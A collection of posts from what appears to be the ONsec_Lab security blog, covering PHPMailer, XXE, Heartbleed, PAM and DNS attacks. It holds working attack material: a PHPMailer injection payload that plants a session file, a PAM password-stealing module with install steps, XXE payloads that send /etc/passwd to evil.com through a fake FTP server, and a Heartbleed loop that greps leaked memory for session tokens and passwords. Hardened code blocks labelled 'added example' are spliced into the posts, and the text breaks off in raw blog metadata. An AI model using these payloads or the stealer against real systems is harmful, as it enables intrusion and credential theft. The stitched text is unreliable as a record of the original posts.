@ONsec_Lab, the official ONsec research lab blog

<b>Using PHPMailer vulnerability to take the session</b> (2017-01-02)<div dir="ltr" style="text-align: left;" trbidi="on">
At the end of 2016 the world was shocked by a remote code execution exploit for PHPMailer. <div>
<br /></div>
<div>
It's a very common third-party library used by Drupal, WordPress, Joomla and a number of other top web projects.<div>
<br /></div>
<div>
<a href="https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html">PHPMailer <5.2.18 original vulnerability CVE-2016-10033</a></div>
<div>
<a href="https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html">PHPMailer <5.2.20 incorrect patch bypass CVE-2016-10045</a></div>
<div>
<br /></div>
<div>
The root cause of this vulnerability is incorrect filtering of the email address when it is used as an argument to the <b>sendmail</b> utility executed via the system shell. As a result, a remote attacker can write an arbitrary file by using the <b>-X</b> argument.</div>
</div>
<div>
<br /></div>
<div>
The obvious way to exploit this is a web shell upload. However, it depends on two requirements:</div>
<div>
<ol style="text-align: left;">
<li>The attacker must know the full path to the web root directory (e.g. /var/www)</li>
<li>The web application must have file system privileges to write into one of the web directories.</li>
</ol>
<div>
We suggest another way to exploit this vulnerability that has neither of these requirements: uploading a session file. </div>
</div>
<div>
<br /></div>
<div>
For Joomla the exploit could look like this:</div>
<div>
<div>
<pre>$email_from = '"attacker\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0 some"@email.com';
$msg_body = 'joomla|s:1572:"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";';</pre></div>
<div>
<br /></div>
<div>
Then set the value f8af03562e674480401098254fe223e0 in the session cookie and take the profit :)</div>
<div>
<br /></div>
<div>
Moreover, in the Joomla case the base64 body also contains serialized data:</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":1:{s:9:"__default";O:8:"stdClass":3:{s:7:"session";O:8:"stdClass":3:{s:7:"counter";i:8;s:5:"timer";O:8:"stdClass":3:{s:5:"start";i:1483388063;s:4:"last";i:1483388136;s:3:"now";i:1483388365;}s:5:"token";s:32:"nZlydWX1Cx3Ugn8QmcK7DgDbMNFA1Qdy";}s:8:"registry";O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":0:{}s:14:"*initialized";b:1;s:9:"separator";s:1:".";}s:5:"setup";O:8:"stdClass":2:{s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"options";a:15:{s:9:"site_name";s:14:"russia-related";s:11:"admin_email";s:12:"asd@asds.com";s:10:"admin_user";s:5:"admin";s:14:"admin_password";s:28:"russia-relatedrussia-related";s:13:"site_metadesc";s:0:"";s:12:"site_offline";i:0;s:8:"language";s:5:"en-US";s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"db_type";s:6:"mysqli";s:7:"db_host";s:9:"127.0.0.1";s:7:"db_user";s:4:"root";s:7:"db_pass";s:12:"my-secret-pw";s:7:"db_name";s:4:"test";s:6:"db_old";s:6:"backup";s:9:"db_prefix";s:6:"pkc6q_";}}}}s:14:"*initialized";b:0;s:9:"separator";s:1:".";}</span></div>
</div>
<div>
<br /></div>
<div>
So the attacker could also escalate this to RCE.</div>
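A hardened way to handle the sender address before it reaches sendmail, as an added example (this is not PHPMailer's code; the function names are ours and filter_var() alone is shown to be insufficient):

```php
<?php
// Added example, not PHPMailer's code: validate a sender address before it
// becomes a sendmail command-line argument. Function names are assumed.

function isDotAtomLocalPart(string $local): bool
{
    // Only the unquoted "dot-atom" form of RFC 5322. A quoted local part
    // ("..."@host) may legally contain spaces, quotes and backslashes, which
    // is exactly what the -X injection above relies on, so it is refused.
    $atom = '[A-Za-z0-9!#$%&\'*+\/=?^_`{|}~-]+';
    return preg_match('/^' . $atom . '(\.' . $atom . ')*$/', $local) === 1;
}

function safeSenderForSendmail(string $address): ?string
{
    // FILTER_VALIDATE_EMAIL accepts quoted local parts, so on its own it lets
    // the payload from this post through; it is only the first gate here.
    if (filter_var($address, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    $at = strrpos($address, '@');
    if ($at === false || !isDotAtomLocalPart(substr($address, 0, $at))) {
        return null;
    }
    // Quote this single argument. Never run escapeshellcmd() over the fully
    // assembled command afterwards: stacking the two escapes is what the
    // CVE-2016-10045 patch bypass linked above abused.
    return escapeshellarg($address);
}

// Constructed inputs: a normal address and the injection string from this post.
$tests = [
    'user@example.com',
    '"attacker\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0 some"@email.com',
];
foreach ($tests as $t) {
    $r = safeSenderForSendmail($t);
    printf("%-80s => %s\n", $t, $r === null ? 'REJECTED' : 'sendmail -f ' . $r);
}
```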
<div>
<div>
<br /></div>
</div>
</div>
Posted by Ivan Novikov

<b>New PHP extensions should be hardcoded :)</b> (2016-04-25)<div dir="ltr" style="text-align: left;" trbidi="on">
PHP 6 and PHP 7 are here.<br />
Many applications still use blacklist filtering for uploads and other file operations.<br />
Note that you should now add <b>".php6"</b> and <b>".php7"</b> to these lists.<br />
<br />
Finally it will look like:<br />
<blockquote class="tr_bq">
.php3<br />.php4<br />.php5<br />.php6<br />.php7<br />.phtm<br />.phtml<br />...</blockquote>
We still recommend using whitelists to enumerate safe extensions.</div>
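As an added illustration (not code from the post), the same upload names run through a blacklist that predates PHP 7 and through a whitelist; the helper names are assumed:

```php
<?php
// Added example, not from the post: a pre-PHP 7 blacklist next to a whitelist.
// Helper names are assumed.

// The kind of list the post says must now grow ".php6" and ".php7".
const OLD_BLACKLIST  = ['php', 'php3', 'php4', 'php5', 'phtml'];
// A whitelist needs no change when a new PHP release ships.
const SAFE_WHITELIST = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

function extensionOf(string $name): string
{
    // Last extension only, lowercased so ".PHTM" and ".phtm" are the same case.
    return strtolower(pathinfo($name, PATHINFO_EXTENSION));
}

function blacklistAllows(string $name): bool
{
    return !in_array(extensionOf($name), OLD_BLACKLIST, true);
}

function whitelistAllows(string $name): bool
{
    return in_array(extensionOf($name), SAFE_WHITELIST, true);
}

// Constructed upload names.
$names = ['avatar.png', 'shell.php5', 'shell.php7', 'shell.PHTM', 'notes.phtml'];
printf("%-14s %-10s %s\n", 'name', 'blacklist', 'whitelist');
foreach ($names as $n) {
    printf("%-14s %-10s %s\n", $n,
        blacklistAllows($n) ? 'ALLOWED' : 'blocked',
        whitelistAllows($n) ? 'ALLOWED' : 'blocked');
}
```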
Posted by Ivan Novikov

<b>One more useful PHP class for unserialize() bugs</b> (2015-12-09)<div dir="ltr" style="text-align: left;" trbidi="on">
In a hurry to share a common PHP class that is useful for deserialization vulnerabilities.<br />
It's <a href="https://github.com/guzzle/guzzle/blob/master/src/Cookie/FileCookieJar.php">FileCookieJar class of Guzzle project</a>.<br />
<br />
Look at its destructor, <a href="https://github.com/guzzle/guzzle/blob/master/src/Cookie/FileCookieJar.php#L37-L61">https://github.com/guzzle/guzzle/blob/master/src/Cookie/FileCookieJar.php#L37-L61</a>:<br />
<pre><?php
// Excerpt from Guzzle's FileCookieJar. The destructor writes to a path taken
// from object state, so it also runs on an instance produced by unserialize().
public function __destruct()
{
    $this->save($this->filename);
}

/**
 * Saves the cookies to a file.
 *
 * @param string $filename File to save
 * @throws \RuntimeException if the file cannot be found or created
 */
public function save($filename)
{
    $json = [];
    foreach ($this as $cookie) {
        /** @var SetCookie $cookie */
        if (CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) {
            $json[] = $cookie->toArray();
        }
    }
    if (false === file_put_contents($filename, json_encode($json))) {
        throw new \RuntimeException("Unable to save file {$filename}");
    }
}
?></pre>
Who can construct a valid exploit without hints? ;)<br />
It's easy.</div>
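An added example, not Guzzle's code, showing with a toy class why such a destructor is a file-write gadget and how the allowed_classes option of unserialize() (PHP 7.0+) neutralises it; the real fix remains never to unserialize untrusted data. Class and function names are assumed:

```php
<?php
// Added example, not Guzzle's code. A toy class with the same destructor shape
// as FileCookieJar (save to $this->filename) records its "writes" in a static
// array instead of touching disk. Names are assumed.

class SavesOnDestruct
{
    public $filename;
    public $content = '';
    public static $writes = [];

    public function __destruct()
    {
        // FileCookieJar::__destruct() calls save($this->filename): the path is
        // object state, so whoever produced the serialized data chooses it.
        self::$writes[] = [$this->filename, $this->content];
    }
}

function serializedSample(): string
{
    // Constructed stand-in for an untrusted serialized string.
    $o = new SavesOnDestruct();
    $o->filename = '/tmp/constructed-example.txt';
    $o->content = 'constructed';
    $s = serialize($o);
    unset($o);                       // this destructor run is not the point
    SavesOnDestruct::$writes = [];
    return $s;
}

function writesAfterUnrestrictedUnserialize(string $s): int
{
    SavesOnDestruct::$writes = [];
    $obj = unserialize($s);          // a real SavesOnDestruct is instantiated
    unset($obj);                     // ... and its destructor fires on release
    return count(SavesOnDestruct::$writes);
}

function writesAfterRestrictedUnserialize(string $s): array
{
    SavesOnDestruct::$writes = [];
    // PHP >= 7.0: with allowed_classes => false no user class is instantiated;
    // the data comes back as __PHP_Incomplete_Class, which has no destructor.
    $obj = unserialize($s, ['allowed_classes' => false]);
    $class = get_class($obj);
    unset($obj);
    return [$class, count(SavesOnDestruct::$writes)];
}

$s = serializedSample();
echo "unrestricted: writes=", writesAfterUnrestrictedUnserialize($s), "\n";
[$class, $n] = writesAfterRestrictedUnserialize($s);
echo "restricted:   class=$class writes=$n\n";
```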
Posted by Ivan Novikov

<b>Increases the power of PAM steal module.</b> (2015-11-06)<div dir="ltr" style="text-align: left;" trbidi="on">
A year ago we released our <a href="http://lab.onsec.ru/2014/07/pamsteal-plugin-released.html">PAM steal module</a>.<br />
It's the easiest and safest way to steal passwords and escalate local privileges.<br />
<br />
Basically it catches passwords from sudo/su and from local services which use PAM.<br />
But not from the SSH daemon by default.<br />
The reason is that it uses the challenge-response authentication scheme. In this case the password is used to generate the response (hash) on the client side and does not go to the server.<br />
<br />
To fix this "issue" you can edit sshd_config to disable<br />
<blockquote class="tr_bq">
ChallengeResponseAuthentication<br />    Specifies whether challenge-response authentication is allowed<br />    (e.g. via PAM or through authentication styles supported in<br />    login.conf(5)) The default is ``yes''.</blockquote>
<a href="https://www.freebsd.org/cgi/man.cgi?query=sshd_config&sektion=5">https://www.freebsd.org/cgi/man.cgi?query=sshd_config&sektion=5</a><br />
<br />
That's all. Now all passwords from SSH will be logged, as well as passwords typed into su.<br />
NOTICE! Please use key-based auth everywhere, and sudo!</div>
Posted by Ivan Novikov

<b>WordPress 3.9.2- XXE through media upload (WAV ID3 tag)</b> (2014-09-05)<div dir="ltr" style="text-align: left;" trbidi="on">
Recently WordPress patched an XXE vulnerability (<a href="http://wordpress.org/news/2014/08/wordpress-3-9-2/">http://wordpress.org/news/2014/08/wordpress-3-9-2/</a>) which was found during an <a href="https://twitter.com/onsec_lab">@ONsec_lab</a> security audit of another web application.<br />
<br />
Now it's time to describe this vulnerability in detail!<br />
<br />
The reason is the <a href="https://github.com/JamesHeinrich/getID3/">GetID3</a> library, which is included in WordPress by default:<br />
./wp-includes/ID3/getid3.lib.php:<br />
<pre>public static function XML2array($XMLstring) {
    if (function_exists('simplexml_load_string')) {
        if (function_exists('get_object_vars')) {
            // XML taken from the uploaded file's ID3 tag is parsed with
            // external entity resolution enabled
            $XMLobject = <span style="color: red;"><b>simplexml_load_string</b></span>($XMLstring);</pre>
<br />
Requires PHP 5.5.0- (simplexml was patched to disable external entities from about 5.5.0 onward)<br />
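An added hardened stand-in for XML2array(), not getID3's or WordPress's code (the function name safeXmlToArray() is assumed); it refuses any document carrying a DTD, so no external entity can be declared, and keeps libxml off the network besides:

```php
<?php
// Added example, not getID3's or WordPress's code. Function name is assumed.

function safeXmlToArray(string $xml): ?array
{
    // 1. No DTD, no entities: internal and external entity declarations both
    //    need a <!DOCTYPE ...> section, so reject the whole document.
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        return null;
    }
    // 2. Parse defensively anyway: LIBXML_NONET keeps libxml off the network
    //    and, before PHP 8.0, external entity loading is switched off too.
    //    Never pass LIBXML_NOENT here: that flag turns entity substitution ON.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    $obj = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if ($obj === false) {
        return null;
    }
    // Object-to-array conversion, the job XML2array() does for getID3.
    return json_decode(json_encode($obj), true);
}

// Constructed inputs: a harmless tag block and one that declares an entity.
$benign = '<metadata><title>song</title><artist>band</artist></metadata>';
$withDtd = '<!DOCTYPE x [<!ENTITY e SYSTEM "file:///some/local/file">]>'
         . '<metadata><title>&e;</title></metadata>';

var_dump(safeXmlToArray($benign));    // array of the tag fields
var_dump(safeXmlToArray($withDtd));   // rejected before any parsing happens
```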
<br />
To use this vulnerability an attacker must have privileges to upload media (editor privileges, for example).<br />
<br />
PoC is available at our GitHub repo: <a href="https://github.com/ONsec-Lab/scripts/blob/master/getid3-xxe.wav">https://github.com/ONsec-Lab/scripts/blob/master/getid3-xxe.wav</a><br />
<br />
<b>Timeline</b>:<br />
5/12/14 vendor notified<br />
5/15/14 vulnerability confirmed<br />
8/06/14 fixed at version 3.9.2</div>
Posted by Ivan Novikov

<b>PAM_steal plugin released</b> (2014-07-18)<div dir="ltr" style="text-align: left;" trbidi="on">
Typically a pentest's attack chain can be presented by the following schema:<br />
<blockquote class="tr_bq">
perimeter -> command execution -> privileges escalation -> ...</blockquote>
The next step for pentesters is to gain privileges on other machines.<br />
For example, it can be done by stealing credentials (one of many methods).<br />
Passwords on the local machine are hashed, and cracking them is not so good an option because of the time it takes.<br />
<br />
<a href="http://www.giac.org/paper/gsec/2034/conducting-ssh-man-middle-attacks-sshmitm/103515">SSH MITM</a> (tool: <a href="http://www.signedness.org/tools/mitm-ssh.tgz">http://www.signedness.org/tools/mitm-ssh.tgz</a>) is a good one. It should be noted, though, that passwords can be shared between many services, and thus this is also necessary.<br />
<br />
<a href="http://en.wikipedia.org/wiki/Linux_PAM">PAM</a> (Pluggable Authentication Modules) provides dynamic authorization for applications and services in a Linux system. Our password logger plugin for PAM can be found here: <a href="https://github.com/ONsec-Lab/scripts/tree/master/pam_steal">https://github.com/ONsec-Lab/scripts/tree/master/pam_steal</a><br />
<br />
This is a good next step after rooting machines during penetration tests.<br />
<br />
Install process:<br />
<blockquote class="tr_bq">
./make.sh<br />
vim /etc/pam.d/common-auth<br />
add "auth required pam_steal.so" into it</blockquote>
Then check /tmp/.steal.log - all FTP/SSH and other PAM-based daemons' passwords will be there!</div>
Posted by Ivan Novikov

<b>XXE OOB exploitation at Java 1.7+</b> (2014-06-23)<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
Java since 1.7 has patched the gopher:// scheme (thanks to A. Polyakov for that: <a href="https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf">https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf</a>)</div>
<div>
But it also patched the HttpClient class.</div>
<div>
<br /></div>
<div>
Now Java no longer turns multiline URIs into valid ones by URL-encoding them.</div>
<div>
<br /></div>
<div>
This fix produces a "java.net.MalformedURLException: Illegal character in URL" exception when the URL contains newlines or other control characters.</div>
<div>
<br /></div>
<div>
XXE payload:</div>
<blockquote class="tr_bq">
<pre><!ENTITY % b SYSTEM "file:///tmp/">
<!ENTITY % c "<!ENTITY &#37; rrr SYSTEM 'http://evil.com:8000/%b;'>">
%c;</pre>
</blockquote>
<div>
The XXE OOB attack technique was first discovered in 2009 by T. Terada:</div>
<div>
<a href="http://d.hatena.ne.jp/teracc/20090718#1247918667">http://d.hatena.ne.jp/teracc/20090718#1247918667</a></div>
<div>
And rediscovered later by T. Yunusov and A. Osipov with additional features such as attribute entities:</div>
<div>
<a href="https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf">https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf</a></div>
<div>
<br /></div>
<div>
Feel the difference:<br />
<br />
Java 1.7-:</div>
<div>
GET /.font-unix%0A.ICE-unix%0A.X11-unix%0AaprmovGRx%0Aasd%0AeTSrv%0Ahosts%0Alaunchd-277.sloRFO%0Alaunchd-492.s4PJbX%0Alaunchd-5486.ocD8IC%0Alaunchd-9800.eUprC8%0Alaunch-j7JvAs%0Alaunch-L6bUiQ%0Alaunch-WELXDr%0Apasswd%0Axxe.xml%0A HTTP/1.1</div>
<div>
User-Agent: Java/1.6.0_65</div>
<div>
...</div>
<div>
<br /></div>
<div>
Java 1.7+:</div>
<div>
nothing!</div>
<div>
Stack trace:</div>
<blockquote class="tr_bq">
<u><span style="color: blue;">java.net.MalformedURLException</span></u><span style="color: red;">: Illegal character in URL<br />at sun.net.www.http.HttpClient.getURLFile(HttpClient.java:583)<br />at sun.net.www.protocol.http.HttpURLConnection.getRequestURI(HttpURLConnection.java:2298)<br />at sun.net.www.protocol.http.HttpURLConnection.writeRequests(HttpURLConnection.java:513)<br />...<br />at com.sun.org.apache.xerces.internal.parsers.XMLParser.parse(XMLParser.java:141)<br />at com.sun.org.apache.xerces.internal.parsers.DOMParser.parse(DOMParser.java:243)<br />at com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderImpl.parse(DocumentBuilderImpl.java:347)</span></blockquote>
<div>
<br /></div>
<div>
This makes XXE OOB exploitation impossible.</div>
<div>
<br /></div>
<div>
We met this problem during a security audit and solved it by using FTP and hacker's logic :) The main trick is that Java still has no URI validation in the FTP case.</div>
<div>
<br /></div>
<div>
Each line of a multiline FTP URI will be requested as a separate directory with a CWD command. Each "/" character within a line will also be split off into a separate CWD request.</div>
<div>
<br /></div>
<div>
To exploit it you need to emulate an FTP server, of course.</div>
<div>
<i>git clone <a href="https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb">https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb</a></i></div>
<div>
<div>
<br /></div>
<div>
<pre>require 'socket'
server = TCPServer.new 8000
loop do
  Thread.start(server.accept) do |client|
    puts "New client connected"
    data = ""
    client.puts("220 xxe-ftp-server")
    loop {
      req = client.gets()
      puts "< " + req
      if req.include? "USER"
        client.puts("331 password please - version check")
      else
        puts "> 230 more data please!"
        client.puts("230 more data please!")
      end
    }
  end
end</pre>
</div>
</div>
<div>
<br /></div>
<div>
You can also put the payload into the username or password, like this:</div>
<blockquote class="tr_bq">
<pre><!ENTITY % c "<!ENTITY &#37; rrr SYSTEM 'ftp://%b;:aaa@evil.com:8000/'>"></pre>
</blockquote>
<div>
or</div>
<blockquote class="tr_bq">
<pre><!ENTITY % c "<!ENTITY &#37; rrr SYSTEM 'ftp://aaa:%b;@evil.com:8000/'>"></pre>
</blockquote>
<div>
And retrieve all the data in only one request. But in this case you cannot read files containing the ":" character (such as /etc/passwd), because:</div>
<blockquote class="tr_bq">
<span style="color: blue;"><u>java.net.MalformedURLException</u></span><span style="color: red;">: For input string: "x:0:0:root:"<br />at java.net.URL.<init>(URL.java:619)<br />at java.net.URL.<init>(URL.java:482)<br />at java.net.URL.<init>(URL.java:431)</span></blockquote>
<div>
<br /></div>
<div>
Finally we got something like this: </div>
<div>
<br /></div>
<div>
XXE payload: </div>
<blockquote class="tr_bq">
<pre><?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://evil.com/ext.dtd">
%asd;
%rrr;
]>
<a></a></pre>
</blockquote>
<div>
External DTD payload (hosted at http://evil.com/ext.dtd):</div>
<blockquote class="tr_bq">
<pre><!ENTITY % b SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY &#37; rrr SYSTEM 'ftp://evil.com:8000/%b;'>"></pre>
</blockquote>
<div>
$ ruby xxe-ftp-server.rb</div>
<blockquote class="tr_bq">
New client connected<br />
< USER anonymous<br />
< PASS Java1.7.0_45@<br />
> 230 more data please!<br />
< TYPE I<br />
> 230 more data please!<br />
< CWD <span style="color: red;"><b>root:x:0:0:root:</b></span><br />
> 230 more data please!<br />
< CWD <span style="color: red;"><b>root:</b></span><br />
> 230 more data please!<br />
< CWD <span style="color: red;"><b>bin</b></span><br />
> 230 more data please!<br />
< CWD <span style="color: red;"><b>bash</b></span><br />
> 230 more data please!<br />
< <span style="color: red;"><b>daemon:x:1:1:daemon:</b></span></blockquote>
<div>
...</div>
<div>
root:x:0:0:root:/root:/bin/bash -----/*slash separation*/-----> root:x:0:0:root: root: bin bash</div>
</div>
Posted by Ivan Novikov

<b>Memory dumper based on CVE-2014-0160</b> (2014-04-08)<div dir="ltr" style="text-align: left;" trbidi="on">
You already know about this bug, of course:<br />
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160<br />
<br />
Just an easy patch to the original PoC: https://gist.github.com/ixs/10116537<br />
<br />
<pre>import re  # add next to the gist's other imports if it is not already there

def hexdump(s):
    # Instead of hex-dumping the leaked memory, grep it for fields that look
    # like secrets, print the matches and exit; the shell loop below restarts
    # the script for the next dump.
    r = r"((sid|token|sess|pass|basic|oauth).*)"
    m = re.findall(r, s)
    print(m)
    sys.exit()</pre>
<div style="text-align: left;">
<span style="font-family: Times; white-space: normal;">And some bash now:</span></div>
<pre>~$ while true; do ./ssltest.py company.com >> regexped; done</pre>
<br />
We have plans to rewrite this PoC to use only one socket for multiple dumps.
</div>
Posted by Vladimir

<b>The mobile application's role in web application security audits</b> (2013-09-12)<div dir="ltr" style="text-align: left;" trbidi="on">
Modern web projects also have mobile applications.<br />
In terms of the client-server model, a mobile application is a client, like a browser.<br />
The server is the web application: PHP/Java/RoR or another platform's code.<br />
<br />
Mobile applications interact with the server just like a browser does, because the HTTP(S) protocol is very common.<br />
<br />
Thus, when we talk about a security audit of a web application's server-side code, we must also carry out security checks of the parts that interact with mobile applications, not just those that interact with browsers.<br />
<br />
In order to understand how a mobile application communicates with the application server (which requests it sends, which URLs and parameters it uses), it is necessary to explore the mobile app.<br />
<br />
The simplest and most reliable way to do this is to intercept the traffic on the same network that the mobile application uses to send requests to the application server. This may be Wi-Fi, or your own network card if the application is run in an emulator.<br />
<br />
But recently we found another, easier way to collect references left in the code by the developers of mobile applications. This method is an excellent complement to the first option, traffic interception.<br />
<br />
The free online service <a href="http://hackapp.com/">hackapp.com</a> allows you to perform a security check of iOS mobile apps, including collecting the links found within them.<br />
<br />
A few examples:<br />
<a href="http://hackapp.com/open#8f311762063d536ca6353b3b5ab4d02d">http://hackapp.com/open#8f311762063d536ca6353b3b5ab4d02d</a><br />
Samsung mobile print application:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheDp0vRnWv1dXPJgwC3h7uTH1c41ZfhZ-lCiALm96CZSHBs-x2sJHACDFn5cjGzVqGZ4NJNcnCxzIca6BAWSHgXletdOq1nlWaT0qDimaHniJ0kYeqkqX_vUNUzGqQtcYdiG1vRartBog/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-09-12+%D0%B2+15.25.11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheDp0vRnWv1dXPJgwC3h7uTH1c41ZfhZ-lCiALm96CZSHBs-x2sJHACDFn5cjGzVqGZ4NJNcnCxzIca6BAWSHgXletdOq1nlWaT0qDimaHniJ0kYeqkqX_vUNUzGqQtcYdiG1vRartBog/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-09-12+%D0%B2+15.25.11.png" /></a></div>
<br />
<br />
This information can also help auditors during penetration testing.<br />
<br />
But sometimes this service surprises us with a startling discovery, for example, private keys!<br />
<a href="http://hackapp.com/open#e9e5b174f4955cb4993fbf3393460005">http://hackapp.com/open#e9e5b174f4955cb4993fbf3393460005</a><br />
Samsung (again) SmartTangoTalk application:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht8OcHQfKuBnKBat1jX6x7d35BCeY9c3PSgRmFse985sqRMwx42Pv82nz7kCr70tHc4rNbXiBG1Y3IOQuDZmP9aZtvDiIvoG2tHqK3VllVZr0bhw-l4h9ryqyFf32Tb-DIOgnBNnixNIY/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-09-12+%D0%B2+15.29.26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht8OcHQfKuBnKBat1jX6x7d35BCeY9c3PSgRmFse985sqRMwx42Pv82nz7kCr70tHc4rNbXiBG1Y3IOQuDZmP9aZtvDiIvoG2tHqK3VllVZr0bhw-l4h9ryqyFf32Tb-DIOgnBNnixNIY/s1600/%D0%A1%D0%BD%D0%B8%D0%BC%D0%BE%D0%BA+%D1%8D%D0%BA%D1%80%D0%B0%D0%BD%D0%B0+2013-09-12+%D0%B2+15.29.26.png" /></a></div>
Enjoy!</div>
Posted by Vladimir

<b>Insecure DNS records in top web projects</b> (2013-07-02)<div dir="ltr" style="text-align: left;" trbidi="on">
Last month ONsec_lab discovered and reported the same DNS issue in top web projects: live.com, facebook.com, yahoo.com, nokia.com, paypal.com, baidu.com, att.com and many others.<br />
<div>
<br /></div>
<div>
<div>
DNS linked a few *.COMPANY.com domains to IP addresses which do not belong to COMPANY.</div>
<div>
<br /></div>
<div>
These addresses are from the Private Address Space 10/8, 172.16/12, 192.168/16 (see <a href="http://tools.ietf.org/html/rfc1918">http://tools.ietf.org/html/rfc1918</a>, <a href="https://en.wikipedia.org/wiki/IPv4">https://en.wikipedia.org/wiki/IPv4</a>) and localhost 127.0.0.1.</div>
</div>
<div>
<br /></div>
<div>
Basically, this may be interpreted as information leakage from COMPANY's intranet. But that's obvious :)<br />
<br />
This server-side issue can be exploited as a client-side vulnerability when the attacker and the victim are on the same private network:</div>
<div>
<br /></div>
<div>
E.g. local.COMPANY.com has an A record pointing to 10.0.0.123</div>
<div>
<br /></div>
<div>
<div>
1. The attacker connects to any public network whose address space is 10.0.0.0/8 or another range that some local.COMPANY.com domain points into.</div>
<div>
2. The attacker adds to the network interface of his computer the address from the A record, i.e. the private address 10.0.0.123.</div>
<div>
3. The attacker publishes a link to local.COMPANY.com on any resource (for example, a banner on a news site), just like a classic CSRF/reflected XSS attack.</div>
<div>
4. All users who are connected to the same network (1) and see the banner (3) will make a request to http://local.COMPANY.com, which will actually be made to the attacker's computer. The browser will send the cookies for *.COMPANY.com in this request, because the user makes the request to local.live.com. </div>
<div>
<br /></div>
<div>
In this case the malicious user steals cookies.</div>
</div>
<div>
<br /></div>
<div>
What about protection? </div>
<div>
<br /></div>
<div>
The simple way is to protect session cookies with the Secure flag. This is Facebook's way. But the attacker can still steal the other, non-Secure cookies. Also, in this case the attacker can perform a logout attack, because browsers have only 4Kb of memory for all the cookies stored for all *.COMPANY.com domains. For this reason the attacker can set many new cookies from local.COMPANY.com to evict all cookies in the *.COMPANY.com and COMPANY.com scope.</div>
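An added example (not from the post) that flags A records pointing into private or loopback space, reading the grep-style "./zone:IP<tab>host" lines this post uses for its findings; the function names are assumed:

```php
<?php
// Added example, not from the post: scan "./zone:IP<tab>hostname" lines and
// flag records whose address is RFC 1918 space or loopback. Names are assumed.

function isPrivateOrLoopback(string $ip): bool
{
    // Must be a syntactically valid IPv4 address at all ...
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        return false;
    }
    // ... and fail once private (10/8, 172.16/12, 192.168/16) and reserved
    // ranges (127/8 among them) are excluded.
    $public = filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_IPV4 | FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE);
    return $public === false;
}

function flagInternalRecords(array $lines): array
{
    $flagged = [];
    foreach ($lines as $line) {
        // grep -r output over per-zone dumps: ./zone:IP<whitespace>host
        if (preg_match('/^\.\/(\S+?):(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)$/', trim($line), $m) !== 1) {
            continue;   // not a record line (blank separators, headers, ...)
        }
        [, $zone, $ip, $host] = $m;
        if (isPrivateOrLoopback($ip)) {
            $flagged[] = "$host -> $ip (from $zone)";
        }
    }
    return $flagged;
}

// Constructed sample input mixing one public record with internal ones.
$sample = [
    "./example.com:93.184.216.34\twww.example.com",
    "./example.com:10.0.0.123\tlocal.example.com",
    "",
    "./example.com:172.21.214.214\tlinux.example.com",
    "./example.com:127.0.0.1\tdev.example.com",
    "./example.com:192.168.13.127\tinternal.example.com",
];
foreach (flagInternalRecords($sample) as $record) {
    echo "INTERNAL ADDRESS IN PUBLIC DNS: $record\n";
}
```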
<div>
<br /></div>
<div>
Some examples:</div>
<div>
<br /></div>
</div>
</div>
Vladimirhttp://www.blogger.com/profile/15214373847405926820noreply@blogger.com92tag:blogger.com,1999:blog-7173843122198586393.post-41400879627439773182013-05-13T12:47:00.000-07:002013-05-13T12:47:06.243-07:00When Integer cannot protect you from SQL injection?<div dir="ltr" style="text-align: left;" trbidi="on">
It is commonly assumed that casting user data to a numeric type fully protects against SQL injection.<br />
<br />
Look at a simple example:<br />
<br />
